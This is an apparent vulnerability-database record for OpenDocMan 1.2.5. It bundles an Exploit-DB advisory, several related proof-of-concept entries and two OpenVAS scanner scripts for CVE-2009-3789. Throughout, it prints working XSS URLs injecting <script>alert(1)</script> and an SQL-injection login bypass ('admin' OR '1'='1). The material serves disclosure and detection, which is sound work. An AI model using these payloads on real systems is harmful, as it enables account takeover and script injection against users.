ID EDB-ID:33299 Type exploitdb Reporter Amol Naik Modified 2009-10-21T00:00:00
Description
OpenDocMan 1.2.5 category.php XSS. CVE-2009-3789. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/36777/info
OpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OpenDocMan 1.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/opendocman/category.php/"><script>alert(1)</script><"?aku=c3VibWl0PWFkZCZzdGF0ZT0y
{"id": "EDB-ID:33299", "type": "exploitdb", "bulletinFamily": "exploit", "title": "OpenDocMan 1.2.5 category.php XSS", "description": "OpenDocMan 1.2.5 category.php XSS. CVE-2009-3789. Webapps exploit for php platform", "published": "2009-10-21T00:00:00", "modified": "2009-10-21T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/33299/", "reporter": "Amol Naik", "references": [], "cvelist": ["CVE-2009-3789"], "lastseen": "2016-02-03T18:53:52", "viewCount": 3, "enchantments": {"score": {"value": 4.4, "vector": "NONE", "modified": "2016-02-03T18:53:52", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3789"]}, {"type": "exploitdb", "idList": ["EDB-ID:33296", "EDB-ID:33295", "EDB-ID:33305", "EDB-ID:33302", "EDB-ID:33301", "EDB-ID:33297", "EDB-ID:33303", "EDB-ID:33304", "EDB-ID:9903", "EDB-ID:33300"]}, {"type": "openvas", "idList": ["OPENVAS:900885", "OPENVAS:1361412562310900885"]}], "modified": "2016-02-03T18:53:52", "rev": 2}, "vulnersScore": 4.4}, "sourceHref": "https://www.exploit-db.com/download/33299/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/category.php/\"><script>alert(1)</script><\"?aku=c3VibWl0PWFkZCZzdGF0ZT0y", "osvdbidlist": ["59306"]}
{"cve": [{"lastseen": "2020-10-03T11:54:18", "description": "Multiple cross-site scripting (XSS) vulnerabilities in OpenDocMan 1.2.5 allow remote attackers to inject arbitrary web script or HTML via the last_message parameter to (1) add.php, (2) toBePublished.php, (3) index.php, and (4) admin.php; the PATH_INFO to the default URI to (5) category.php, (6) department.php, (7) profile.php, (8) rejects.php, (9) search.php, (10) toBePublished.php, (11) user.php, and (12) view_file.php; and (13) the caller parameter in a Modify User action to user.php.", "edition": 3, "cvss3": {}, "published": "2009-10-26T17:30:00", "title": "CVE-2009-3789", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3789"], "modified": "2017-08-17T01:31:00", "cpe": ["cpe:/a:opendocman:opendocman:1.2.5"], "id": "CVE-2009-3789", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3789", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:opendocman:opendocman:1.2.5:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-03T18:53:22", "description": "OpenDocMan 1.2.5 add.php last_message Parameter XSS. CVE-2009-3789. Webapps exploit for php platform", "published": "2009-10-21T00:00:00", "type": "exploitdb", "title": "OpenDocMan 1.2.5 add.php last_message Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33295", "href": "https://www.exploit-db.com/exploits/33295/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n\r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n\r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n\r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/add.php?last_message=<script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33295/"}, {"lastseen": "2016-02-03T18:53:29", "description": "OpenDocMan 1.2.5 toBePublished.php Multiple Parameter XSS. CVE-2009-3789. Webapps exploit for php platform", "published": "2009-10-21T00:00:00", "type": "exploitdb", "title": "OpenDocMan 1.2.5 toBePublished.php Multiple Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33296", "href": "https://www.exploit-db.com/exploits/33296/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/toBePublished.php/\"><script>alert(1)</script>\r\nhttp://www.example.com/opendocman/toBePublished.php?last_message=<script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33296/"}, {"lastseen": "2016-02-03T18:53:37", "description": "OpenDocMan 1.2.5 index.php last_message Parameter XSS. CVE-2009-3789. Webapps exploit for php platform", "published": "2009-10-21T00:00:00", "type": "exploitdb", "title": "OpenDocMan 1.2.5 index.php last_message Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33297", "href": "https://www.exploit-db.com/exploits/33297/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/index.php?last_message=<script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33297/"}, {"lastseen": "2016-02-03T18:53:44", "description": "OpenDocMan 1.2.5 admin.php last_message Parameter XSS. CVE-2009-3789. Webapps exploit for php platform", "published": "2009-10-21T00:00:00", "type": "exploitdb", "title": "OpenDocMan 1.2.5 admin.php last_message Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33298", "href": "https://www.exploit-db.com/exploits/33298/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/admin.php?last_message=<script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33298/"}, {"lastseen": "2016-02-03T18:53:59", "description": "OpenDocMan 1.2.5 department.php XSS. CVE-2009-3789 . Webapps exploit for php platform", "published": "2009-10-21T00:00:00", "type": "exploitdb", "title": "OpenDocMan 1.2.5 department.php XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33300", "href": "https://www.exploit-db.com/exploits/33300/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/department.php/\"><script>alert(1)</script><\"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI=", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33300/"}, {"lastseen": "2016-02-03T18:54:06", "description": "OpenDocMan 1.2.5 profile.php XSS. CVE-2009-3789. Webapps exploit for php platform", "published": "2009-10-21T00:00:00", "type": "exploitdb", "title": "OpenDocMan 1.2.5 profile.php XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33301", "href": "https://www.exploit-db.com/exploits/33301/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/profile.php/\"><script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33301/"}, {"lastseen": "2016-02-03T18:54:14", "description": "OpenDocMan 1.2.5 rejects.php XSS. CVE-2009-3789 . Webapps exploit for php platform", "published": "2009-10-21T00:00:00", "type": "exploitdb", "title": "OpenDocMan 1.2.5 rejects.php XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33302", "href": "https://www.exploit-db.com/exploits/33302/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/rejects.php/\"><script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33302/"}, {"lastseen": "2016-02-03T18:54:23", "description": "OpenDocMan 1.2.5 search.php XSS. CVE-2009-3789. Webapps exploit for php platform", "published": "2009-10-21T00:00:00", "type": "exploitdb", "title": "OpenDocMan 1.2.5 - search.php XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33303", "href": "https://www.exploit-db.com/exploits/33303/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/search.php/\"><script>alert(1)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33303/"}, {"lastseen": "2016-02-03T18:54:32", "description": "OpenDocMan 1.2.5 user.php XSS. CVE-2009-3789. Webapps exploit for php platform", "published": "2009-10-21T00:00:00", "type": "exploitdb", "title": "OpenDocMan 1.2.5 user.php XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-21T00:00:00", "id": "EDB-ID:33304", "href": "https://www.exploit-db.com/exploits/33304/", "sourceData": "source: http://www.securityfocus.com/bid/36777/info\r\n \r\nOpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n \r\nOpenDocMan 1.2.5 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/opendocman/user.php/\"><script>alert(1)</script><\"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI=\r\nhttp://www.example.com/opendocman/user.php?submit=Modify+User&item=2&caller=/opendocman/\"><script>alert(123)</script><\"", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33304/"}, {"lastseen": "2016-02-01T11:29:47", "description": "OpenDocMan 1.2.5 xss, SQL injection. CVE-2009-3789. Webapps exploit for php platform", "published": "2009-10-20T00:00:00", "type": "exploitdb", "title": "OpenDocMan 1.2.5 - XSS & SQL injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3789"], "modified": "2009-10-20T00:00:00", "id": "EDB-ID:9903", "href": "https://www.exploit-db.com/exploits/9903/", "sourceData": "Security Advisory : Multiple vulnerabilities in OpenDocMan\r\nDiscovered by \t==> Amol Naik (amolnaik4[at]gmail.com)\r\n\r\n## Overview ##\r\n--------------\r\nOpenDocMan is a free document management system (DMS) designed to comply with ISO 17025 and OIE standard for document management. It features web based access, fine grained control of access to files, and automated install and upgrades.\r\n\r\n\r\n## Vulnerability Description ##\r\n-----------------\r\nOpenDocMan is vulnerable to authentication bypass and multiple cross-site scripting issues.\r\n\r\n\r\n\r\n## Technical Details ##\r\n-------------\r\nVulnerable Product \t: OpenDocMan v1.2.5\r\nDownload\t\t: http://sourceforge.net/projects/opendocman/files/opendocman/1.2.5/opendocman-1.2.5.zip/download\r\n\r\n\r\nAuthentication Bypass:\r\n----------------------\r\n\r\nA valid username require to carry put Auth Bypass. Default is \"admin\".\r\n\r\n\r\nCross-site Scripting:\r\n---------------------\r\n\r\nMultiple instances of Cross-site scripting found majorly due to use of $_SERVER['PHP_SELF'] in action parameter of form field and due to absence of validation for \"last_message\" parameter.\r\n\r\n\r\n\r\n## Proof of concept ##\r\n----------------------\r\n\r\nAuthentication Bypass:\r\n----------------------\r\n\r\nUsername : admin' OR '1'='1\r\nPassword : nothing\r\n\r\nCross-site scripting:\r\n---------------------\r\n\r\nhttp://localhost/opendocman/category.php/\"><script>alert(1)</script><\"?aku=c3VibWl0PWFkZCZzdGF0ZT0y\r\nhttp://localhost/opendocman/department.php/\"><script>alert(1)</script><\"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI=\r\nhttp://localhost/opendocman/profile.php/\"><script>alert(1)</script>\r\nhttp://localhost/opendocman/rejects.php/\"><script>alert(1)</script>\r\nhttp://localhost/opendocman/search.php/\"><script>alert(1)</script>\r\nhttp://localhost/opendocman/toBePublished.php/\"><script>alert(1)</script>\r\nhttp://localhost/opendocman/user.php/\"><script>alert(1)</script><\"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI=\r\nhttp://localhost/opendocman/view_file.php/\"><script>alert(1)</script><\"?aku=aWQ9NiZzdGF0ZT0z\r\nhttp://localhost/opendocman/index.php?last_message=<script>alert(1)</script>\r\nhttp://localhost/opendocman/user.php?submit=Modify+User&item=2&caller=/opendocman/\"><script>alert(123)</script><\"\r\nhttp://localhost/opendocman/add.php?last_message=<script>alert(1)</script>\r\nhttp://localhost/opendocman/toBePublished.php?last_message=<script>alert(1)</script>\r\nhttp://localhost/opendocman/admin.php?last_message=<script>alert(1)</script>\r\n\r\n## Workaround ##\r\n----------------\r\nUpdate to newer version v1.2.5.2\r\nopendocmanv1.2.5.2: http://sourceforge.net/projects/opendocman/files/opendocman/1.2.5.2/opendocman-1.2.5.2.zip/download\r\n\r\n\r\n## TimeLine ##\r\n----------------------\r\n10th Oct 2009 : Bug Discovered\r\n12th Oct 2009 : vendor was notified by e-mail\r\n12th Oct 2009 : Vendor response received\r\n20th Oct 2009 : A new release publicly available\r\n20th Oct 2009 : Public Disclosure\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/9903/"}], "openvas": [{"lastseen": "2017-07-02T21:14:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3801", "CVE-2009-3789", "CVE-2009-3788"], "description": "This host is running OpenDocMan and is prone to multiple Cross-Site\n Scripting and SQL Injection vulnerabilities.", "modified": "2017-01-27T00:00:00", "published": "2009-10-29T00:00:00", "id": "OPENVAS:900885", "href": "http://plugins.openvas.org/nasl.php?oid=900885", "type": "openvas", "title": "OpenDocMan Multiple XSS and SQL Injection Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_opendocman_xss_n_sql_inj_vuln.nasl 5122 2017-01-27 12:16:00Z teissa $\n#\n# OpenDocMan Multiple XSS and SQL Injection Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to cause Cross-Site Scripting or\n SQL Injection attacks by executing arbitrary codes with in the context of the\n affected application.\n Impact Level: Application.\";\ntag_affected = \"OpenDocMan version prior to 1.2.5.2\";\ntag_insight = \"- Input passed to the 'frmuser' and 'frmpass' parameters in 'index.php' is not\n properly sanitised before being used in SQL queries.\n - Input passed to the 'last_message' parameter in add.php, toBePublished.php,\n index.php, and admin.php, and input passed via the URL to category.php,\n department.php, profile.php, rejects.php, search.php, toBePublished.php,\n view_file.php, and user.php is not properly sanitised before being returned\n to the user.\";\ntag_solution = \"Upgrade to OpenDocMan version 1.2.5.2 or later.\n http://www.opendocman.com/\";\ntag_summary = \"This host is running OpenDocMan and is prone to multiple Cross-Site\n Scripting and SQL Injection vulnerabilities.\";\n\nif(description)\n{\n script_id(900885);\n script_version(\"$Revision: 5122 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-27 13:16:00 +0100 (Fri, 27 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-29 07:53:15 +0100 (Thu, 29 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-3788\", \"CVE-2009-3789\", \"CVE-2009-3801\");\n script_bugtraq_id(36777);\n script_name(\"OpenDocMan Multiple XSS and SQL Injection Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/30750/\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/53886\");\n script_xref(name : \"URL\" , value : \"http://www.packetstormsecurity.org/0910-exploits/opendocman-sqlxss.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_MIXED_ATTACK);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_opendocman_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ndocmanPort = get_http_port(default:80);\nif(!docmanPort){\n exit(0);\n}\n\ndocmanVer = get_kb_item(\"www/\"+ docmanPort + \"/OpenDocMan\");\nif(!docmanVer){\n exit(0);\n}\n\ndocmanVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:docmanVer);\nif(docmanVer[2] && !safe_checks())\n{\n filename = string(docmanVer[2] + \"/index.php\");\n host = get_host_name();\n\n authVariables = \"frmuser=admin' OR '1'='1&frmpass=&login=Enter\";\n sndReq1 = string(\"POST \", filename, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Referer: http://\", host, filename, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(authVariables), \"\\r\\n\\r\\n\",\n authVariables);\n rcvRes1 = http_send_recv(port:docmanPort, data:sndReq1);\n if(egrep(pattern:\"Location: out.php\", string:rcvRes1))\n {\n security_message(docmanPort);\n exit(0);\n }\n\n sndReq2 = http_get(item:string(docmanVer[2], \"/index.php?last_message=\" +\n \"<script>alert(1)</script>\"), port:docmanPort);\n rcvRes2 = http_send_recv(port:docmanPort, data:sndReq2);\n if(rcvRes2 =~ \"HTTP/1\\.. 200\" && \"<script>alert(1)</script><\" >< rcvRes2)\n {\n security_message(docmanPort);\n exit(0);\n }\n}\n\nif(docmanVer[1])\n{\n # Check for OpenDocMan version prior to 1.2.5.2\n if(version_is_less(version:docmanVer[1], test_version:\"1.2.5.2\")){\n security_message(docmanPort);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-05-12T17:33:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3801", "CVE-2009-3789", "CVE-2009-3788"], "description": "This host is running OpenDocMan and is prone to multiple Cross-Site\n Scripting and SQL Injection vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2009-10-29T00:00:00", "id": "OPENVAS:1361412562310900885", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900885", "type": "openvas", "title": "OpenDocMan Multiple XSS and SQL Injection Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenDocMan Multiple XSS and SQL Injection Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900885\");\n script_version(\"2020-05-08T11:13:33+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 11:13:33 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-10-29 07:53:15 +0100 (Thu, 29 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-3788\", \"CVE-2009-3789\", \"CVE-2009-3801\");\n script_bugtraq_id(36777);\n script_name(\"OpenDocMan Multiple XSS and SQL Injection Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/30750/\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/53886\");\n script_xref(name:\"URL\", value:\"http://www.packetstormsecurity.org/0910-exploits/opendocman-sqlxss.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_MIXED_ATTACK);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_opendocman_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"OpenDocMan/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to cause Cross-Site Scripting or\n SQL Injection attacks by executing arbitrary codes with in the context of the affected application.\");\n\n script_tag(name:\"affected\", value:\"OpenDocMan version prior to 1.2.5.2\");\n\n script_tag(name:\"insight\", value:\"- Input passed to the 'frmuser' and 'frmpass' parameters in 'index.php' is not\n properly sanitised before being used in SQL queries.\n\n - Input passed to the 'last_message' parameter in add.php, toBePublished.php,\n index.php, and admin.php, and input passed via the URL to category.php,\n department.php, profile.php, rejects.php, search.php, toBePublished.php,\n view_file.php, and user.php is not properly sanitised before being returned to the user.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenDocMan version 1.2.5.2 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running OpenDocMan and is prone to multiple Cross-Site\n Scripting and SQL Injection vulnerabilities.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ndocmanPort = http_get_port(default:80);\n\ndocmanVer = get_kb_item(\"www/\"+ docmanPort + \"/OpenDocMan\");\nif(!docmanVer)\n exit(0);\n\ndocmanVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:docmanVer);\nif(docmanVer[2] && !safe_checks())\n{\n filename = string(docmanVer[2] + \"/index.php\");\n host = http_host_name(port:docmanPort);\n\n authVariables = \"frmuser=admin' OR '1'='1&frmpass=&login=Enter\";\n sndReq1 = string(\"POST \", filename, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Referer: http://\", host, filename, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(authVariables), \"\\r\\n\\r\\n\",\n authVariables);\n rcvRes1 = http_send_recv(port:docmanPort, data:sndReq1);\n if(egrep(pattern:\"Location: out.php\", string:rcvRes1))\n {\n security_message(port:docmanPort, data:\"The target host was found to be vulnerable.\");\n exit(0);\n }\n\n sndReq2 = http_get(item:string(docmanVer[2], \"/index.php?last_message=\" +\n \"<script>alert(1)</script>\"), port:docmanPort);\n rcvRes2 = http_send_recv(port:docmanPort, data:sndReq2);\n if(rcvRes2 =~ \"^HTTP/1\\.[01] 200\" && \"<script>alert(1)</script><\" >< rcvRes2)\n {\n security_message(port:docmanPort, data:\"The target host was found to be vulnerable.\");\n exit(0);\n }\n}\n\nif(docmanVer[1])\n{\n if(version_is_less(version:docmanVer[1], test_version:\"1.2.5.2\")){\n security_message(port:docmanPort, data:\"The target host was found to be vulnerable.\");\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
